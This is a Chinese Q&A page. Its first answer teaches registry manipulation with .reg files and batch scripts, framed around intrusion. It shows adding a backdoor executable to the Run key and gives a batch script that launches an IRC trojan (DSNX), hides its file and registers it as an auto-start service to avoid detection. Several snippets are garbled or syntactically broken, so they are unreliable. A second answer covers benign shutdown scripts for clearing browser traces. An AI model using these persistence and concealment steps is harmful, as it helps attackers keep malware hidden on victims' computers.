如何利用批处理命令删除注册表

如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)

关于注册表的操作，常见的是创建、修改、删除。

1.创建

创建分为两种，一种是创建子项(Subkey)

我们创建一个文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。

另一种是创建一个项目名称

那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"

"Door"=C:\\WINNT\\system32\\door.exe

"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下

新建了:Invader、door、about这三个项目

Invader的类型是“String Value”

door的类型是“REG SZ Value”

Autodos的类型是“DWORD Value”
2.修改

修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。

3.删除

我们首先来说说删除一个项目名称，我们创建一个如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Ex4rch"=-

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了；

我们再看看删除一个子项，我们创建一个如下的脚本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Invader"="Ex4rch"

"door"=hex:255

"Autodos"=dword:000000128

只需要这样：

@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current

Version\Run]>Sample.reg

@echo "Invader"="Ex4rch">>Sample.reg

@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg

@echo "Autodos"=dword:02>>Sample.reg

samlpe2:

我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)

@start windrv32.exe

@attrib +h +r windrv32.exe

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll

@echo "windsnx "=- >>patch.dll

@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe

@regedit /s patch.dll

@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动] 添加评论(0)


评论读取中...
请登录后再发表评论!

取消
韩小考 | 2009-01-08 14:57:59
有0人认为这个回答不错 | 有0人认为这个回答没有帮助
用注销脚本清除上网痕迹

上网冲浪后，系统中总会遗留很多的垃圾需要清理，其中包括IE临时文件、历史记录以及Cookies等等。如果每次都使用手工方法清除则比较麻烦，其实我们只要利用Windows 2000/XP的关机和注销脚本就可以实现自动清理。

清除IE临时文件

为了加快访问速度，IE会将曾经浏览过的网页等内容存放在Temporary Internet Files文件夹中。如果我们不希望他人从这里窥视自己的秘密，可以利用关机脚本让系统自动在关机前进行清理，这里介绍一下具体的操作（以Windows XP为例）。

在“C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown”目录下，新建一个批处理文件Cleanup.bat，内容可根据需要编写。清除IE临时文件的命令为“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\Temporary Internet Files"”。其中参数/Q表示使用安静模式，即删除全局通配符时，不要求确认；参数/S表示从所有子目录删除文件。

单击“开始” “运行”，在运行命令框中输入“Gpedit.msc”，打开组策略窗口。在左侧的控制台树窗格中，依次展开“计算机配置” “Windows设置” “脚本（启动/关机）”节点（如图1），双击右侧详细资料窗格中的“关机”项目，在弹出的“关机属性”对话框中点击“添加”按钮,将 Cleanup.bat添加为新的计算机关机脚本。设置完成后，退出组策略窗口，重新启动计算机即可。


图1

清除Cookies

Cookies是一些小文本文件，用于保存诸如网址、登

录用户名、密码或个人资料、身份识别等信息。Cookies可以让我们更加方便地登录某些网站，但是同时也容易造成个人隐私的泄露，因此有必要及时对计算机中的Cookies进行清理。在Cleanup.bat批处理文件中添加清除 Cookies的命令“DEL/Q "C:\Documents and Settings\<用户名>\Cookies"”即可。

清除IE历史记录

清除IE历史记录通常的方法是“Internet选项” “常规” “清除历史记录”。不过，我们同样可以利用关机脚本来实现自动清理。在前面建立的Cleanup.bat批处理文件中添加一条命令“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\History"”即可。

清除IE地址栏记录

前面清除的IE历史记录还不够彻底，当我们在IE地址栏中输入与曾经输入过的URL一样的字符串时，仍会显示出相关的网址记录。要想清除这些记录，则必须将注册表[HKEY CURRENT USER\Software\Microsoft\Internet Explorer\TypedURLs]分支下的键值全部删除。

用记事本创建一个脚本文件，脚本内容如下：

Dim WSHShell

Set WSHShell = WScript.CreateObject("WScript.Shell")

WSHShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\", ""WSHShell.RegDelete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\"上述脚本共有四句：第一句定义一个变量WSHShell，第二句创建一个对象，第三句写入注册表，如果注册表中不存在该项，执行脚本时会出现错误提示。输入以上内容后将其保存为Cleanup.vbs。注意，后缀名一定要是vbs，这样才能保证脚本的正常执行。

编写完成后，在组策略窗口中依次展开“用户配置” “Windows设置” “脚本（登录/注销）”节点，双击右侧窗格中的“注销”项目，在弹出的“注销属性”对话框中点击“添加”按钮,将Cleanup.vbs添加为注销脚本（如图2）。这样，当计算机注销或关机时就会自动清除IE地址栏记录。



图2

前面介绍了利用关机和注销脚本自动清理上网痕迹的方法，如果你还有其它的项目需要清理，也可以参照上述方法。这里要提醒读者的是，利用脚本实现自动清理前，最好先用手工方式彻底清理一次。